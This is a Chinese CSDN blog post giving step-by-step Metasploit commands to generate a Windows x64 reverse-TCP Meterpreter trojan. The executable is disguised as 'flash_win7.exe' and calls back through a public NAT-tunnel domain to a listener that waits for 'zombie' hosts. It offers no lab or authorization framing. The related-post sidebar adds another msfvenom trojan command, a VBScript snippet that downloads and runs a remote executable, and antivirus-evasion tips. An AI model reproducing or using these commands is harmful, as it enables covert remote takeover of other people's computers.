使用Metaspoit制作木马（内网映射）

最新推荐文章于 2024-07-24 17:04:22 发布

qq_33391644

最新推荐文章于 2024-07-24 17:04:22 发布

阅读量815

点赞数

分类专栏： linux、kali、病毒区

本文链接：https://blog.csdn.net/qq_33391644/article/details/100123003

版权

linux、kali、病毒区专栏收录该内容

24 篇文章 14 订阅

订阅专栏

一、首先把linux映射到外网

教程：https://blog.csdn.net/qq_33391644/article/details/100118247

二、首先还是得打开postgresql

命令：root@kali:~# service postgresql start

三、让我们正式开始吧，因为我的目标平台是一个win7 64 位，所以要找一个相应的载荷

命令：root@kali:~# msfvenom -l | grep windows | grep x64 | grep tcp

四、生成木马（默认路径是在home下）

命令： root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=server.natappfree.cc lport=42599 -f exe X > flash_win7.exe

lhost：填写kali主机映射后的域名

lport：填写kali主机映射后的端口

五、启动msfvenom

命令：root@kali:~# msfconsole

六、设置监听的环境（肉鸡环境）

命令：root@kali:~# use exploit/multi/handler

命令：root@kali:~# set payload windows/x64/meterpreter_reverse_tcp

七、设置监听的ip（本地ip）

命令：root@kali:~# set lhost 192.168.1.3

八、设置监听的端口，本地被映射的端口

命令：root@kali:~# set lport 55555

九、开始监听，等待肉鸡上线

命令：root@kali:~# exploit

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

qq_33391644

关注关注

0
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

macOS下malware移除实战之Gsearch移除（Remove Google hijacking for Gsearch removal under macOS）

我在全球村

07-14

1329

声明： Declaration：由于网络中的病毒virus/malware等存在随时变异或者对应多种感染方式等情况，本文所针对的处理方法仅针对本次样本负责，个人如有误操作，后果自负。如需帮助，请在WeChat（微信）搜索公众号“我在全球村”，关注后给我留言“加好友”。 Because the virus/malware in the network is mutated at any time or corresponds to multiple infection methods, the pro

C++：迭代器介绍

weixin_44808331的博客

07-25

849

资料来源：《C++ Primer》、博客随笔一、什么是迭代器迭代器是一种检查容器内元素并遍历元素的数据类型是 C++ 程序中常用的一种设计模式，它最重要的作用是为访问容器提供了统一的接口。我们希望容器提供一个访问元素的统一接口，从而复用操作函数，这个接口就是迭代器 C++ STL 有许多容器，例如 string、vector、list、deque、map、unordered_m...

参与评论您还未登录，请先登录后发表或查看评论

Metaspoit的使用

dixunzhong8774的博客

10-25

332

一、环境的使用和搭建首先我的攻击机和靶机都搭建在虚拟机上，选用的是VMware Workstation Pro虚拟机。攻击机选用的是Linux kali 2017.2版本，而靶机安装的是XP sp3纯净版。在这里安装虚拟机的时候要注意网络适配器的网络连接方式选用NAT 连接。二、Metaspoit的安装当然在此之前要先更新好kaili的源地址，在这里就不介绍这个相关过程了。 ...

内网隧道——Venom(毒液)

最新发布

qq_55202378的博客

07-24

1014

Venom工具也被称为“毒液工具”，它是一款开源的多级代理工具，使用Go语言开发，支持多种平台。Venom可以将多个节点进行连接，并以节点为跳板构建多级代理搭建网络隧道，渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网管理代理节点，利用"毒液"进行可视化网络拓扑、多级Socks5代理、多级端口转发、端口复用（Apache、Mysql等服务）、SSH隧道、交互式Shell、文件的上传和下载、节点间通信加密等。网络拓扑如下：攻击机kali IP：192.168.111.0。

电脑中了MEMZ病毒怎么办

gfdgd xi

08-09

5266

之前手贱运行了病毒程序，结果就……（省略10000字），历经九九八十一难，总算解决了，于是在此记录一下，下次再出现时就不用翻了准备工作 1、一台电脑（不然怎么运行，可以是已经中毒的实机，也可以是虚拟机，注意千万不要是未中毒的虚拟机哦，因为有失败的几率） 2、病毒程序（如已经中毒请忽略，如需下载，可以在毒多多网站或者直接点击这里下载） 3、一个拥有DiskGenius的Windows PE（市面上的大白菜、U启动都有，制作方法网上一大堆）测试平台 Windows 8.1（本来想要用Deepin/Ubu.

MEMZ木马病毒

ciudadcaa的博客

05-16

1万+

今天做蠕虫弄个memz病毒，把虚拟机搞崩了，重装了一下才解决，详细的了解了一下这种病毒。 MEMZ病毒： MEMZ病毒又称彩虹猫病毒，在运行时,该病毒会不断弹窗导致系统无法正常运行，如果尝试结束MEMZ进程或重启系统，桌面会弹出无数个包含“火星文”的消息对话框，随后计算机进入蓝屏状态。重启后，会在屏幕顶部出现一段英文（译文：你的电脑已经被MEMZ病毒损坏，现在一起来欣赏彩虹猫吧），最后出现一个跳跃的“彩虹猫”动画。运行环境：虚拟机！！！！源代码：Github上有源码，不过好像是越南语的注释，不太

漏洞复现：使用Kali制作木马程序

m0_51617352的博客

12-15

5984

攻击机：Kali2019 靶机：Win7 64位攻击步骤： 1.打开Kali2019和Win7 64位虚拟机，确定IP地址在一个网段 2.确定好IP地址，进入Kali2019进行木马文件.exe制作，命令如下命令：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=172.16.66.128 LPORT=5555 -f exe >pink.exe .

android木马的制作方法,实现木马病毒的详细步骤

weixin_28292761的博客

05-27

1万+

前言：有没有遇到过这种情况，打开邮件，发现一封非常正常的邮件，附带了连接，你不以为然的点进去，结果中木马病毒了，这个套路是不是很熟悉，也很老套，但稍不注意就容易中木马病毒，希拉里邮件门事件不就是这样么？！作为一名程序员，你是否想过怎样实现这样一个木马病毒呢？来吧，这个项目就带你学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理，带你一步步了解如何制作一...

制作防木马U盘工具盘教程

03-07

制作防木马U盘工具盘是一项重要的网络安全措施，尤其在当今数字时代，U盘作为便携式存储设备，被广泛用于数据传输。然而，U盘也是木马病毒传播的常见途径之一。本教程将深入讲解如何创建一个安全的、防止木马感染的...

使用html链接上传木马,一段植入木马的html代码

weixin_28465009的博客

06-09

3011

评论#re: 一段植入木马的html代码2012-06-25 14:47往往v< html >< script language ="VBScript" >on error resume next' 即将下载的木马dl = " ht#tp://ww#w.800vv.com/cc/cj.exe# "' 创建OBJECT元素Set df = docume...

【P3】最强渗透工具 - metasploit（安装配置及使用教程详解）

qq_45138120的博客

06-23

9818

包括 metasploit 是什么？、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。

MemPE:一种通用的XOR加密后内存加载PE绕过杀毒软件的方法

05-08

MemPE 一种通用的XOR加密后内存加载PE绕过杀毒软件的方法 res目录下a.h文件生成方法：EncryptFile.exe 1.exe a.h aArray 123 生成的加密key和loader的解密key一致即可，这里演示用，均为123 理论上可以通过异或加密后将任意malware保存在loader内，不会被安全软件查杀，解密后加载内存，不会产生文件，只要更换加密key，就可以实现再次免杀。注意：1.过不了主动防御。2.在64位操作系统下无效，哪位修改一下？应该只是基址的问题。重要声明：此文章仅供学习交流，请勿用于非法用途！

PowerSploit渗透教程

weixin_43749601的博客

03-21

2146

简介 PowerSploit是一款基于PowerShell的后渗透框架软件，包含很多Powershell攻击脚本，它们主要是用于渗透中的信息侦查、权限提升、权限维持。 https://github.com/mattifestation/PowerSploit Linux下安装和搭建Powersploit 开启Apache服务将下载好的文件放在/var/www/html目录，搭建一个简易的服务器在网页中打开http://localhost/PowerSploit-master/ Powersploi

metasploit介绍及使用

热门推荐

weixin_43873557的博客

02-07

2万+

The Metasploit Framework的简称。MSF高度模块化，即框架由多个module组成，是全球最受欢迎的工具。是一款开源安全漏洞利用和测试工具，集成了各种平台上常见的溢出漏洞和流行的shellcode，并持续保持更新。 metasploit涵盖了渗透测试中全过程，你可以在这个框架下利用现有的Payload进行一系列的渗透测试。目录 kali-metasploit框架目录路径： /opt/metasploit-framework/embedded/framework/ /usr/share

Kali渗透之Metasploit基本使用方法

m0_56988395的博客

02-18

3040

目录启动常用命令 1、核心命令中的connect命令 2、模块相关命令show使用方法 3、模块相关命令search搜索的使用方法 4、模块相关命令use的使用方法 Metaspoit是一个渗透测试平台，能够查找，利用和验证漏洞。官网：Metasploit | Penetration Testing Software, Pen Testing Security | Metasploit 启动 msfconsole 常用命令 1、核心命令中的connect命令.

配置metasploit进行远程攻击的基本步骤和利用metasploit进行基本扫描

D-R0s1的博客

01-26

2335

对metasploit的介绍当完成前期的情报侦察工作以后，通过隐蔽的探测扫描识别到了系统的脆弱点，作为渗透测试人员要进一步的利用漏洞突破目标，获取利益和成就感。 Metasploit框架主要用于攻击工具的开发，漏洞工具的利用和攻击过程的辅助支撑，这个框架最大的优点在于它以研究的理念进行攻击工具的开发。因此，它非常容易开发和使用自己的metasploit模块，攻...

远程控制——ms12-020漏洞利用

Coffilater的博客

12-01

5732

简单介绍Metaspoit Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。Metasploit还提供了一系列可直接运行的功能程序，支持渗透测试者与安全研究人员快速地利用Metasploit框架内部能力完成一些特定任务。比如msfpayload、msfencode和msfvenom可以将攻击载荷封装为可执行文件、C语言、JavaScript语言等多种形式，并可以进行各种类型的编码。

mame0.239选定系统所需要的ROM/磁碟映像档为缺少或不正确

lxyoucan的博客

01-06

1万+

之前发过一个视频，讲MAME怎么配置和使用的。结果有网友反馈说有少部分游戏打开报错，不会弄。运气比较好，我想玩的ROM基本都可以正常使用。我就很奇怪，为什么会报错的呢？我怎么就没有遇到呢？于是我就想尝试找一个ROM来尝试解决一下报错的问题。然后我就选1944这个ROM，为什么选它呢？没有别的原因，就是因为它的排序靠前。是我找到的第一个运行不起来的ROM。

frp内网穿透&入门级木马上线实践

wenake的博客

07-29

2258

简介在实践课上有布置frp内网穿透（内网到公网）和简单的msf木马使用（木马只能内网通信）的任务。此处将两者结合，把木马链接到服务器上，经过内网穿透在本地控制木马。都是入门级实践。准备 frp代码下载：https://github.com/fatedier/frp/releases?tdsourcetag=s_pctim_aiomsg 内网 kali虚拟机公网 Ubuntu服务器...

如何使用kali的msf制作木马

06-10

我很抱歉，我不能回答如何使用Kali的Metasploit Framework（MSF）制作木马的问题，因为这涉及到违法和不道德的行为。MSF是一个用于漏洞测试和渗透测试的工具，但其目的是帮助安全专业人员和网络管理员保护网络安全，而不是破坏网络安全。在任何情况下，不要试图使用Kali或任何其他工具来制作或传播恶意软件，否则你可能会面临法律责任。请遵守相关法规和道德规范，使用工具来促进网络安全。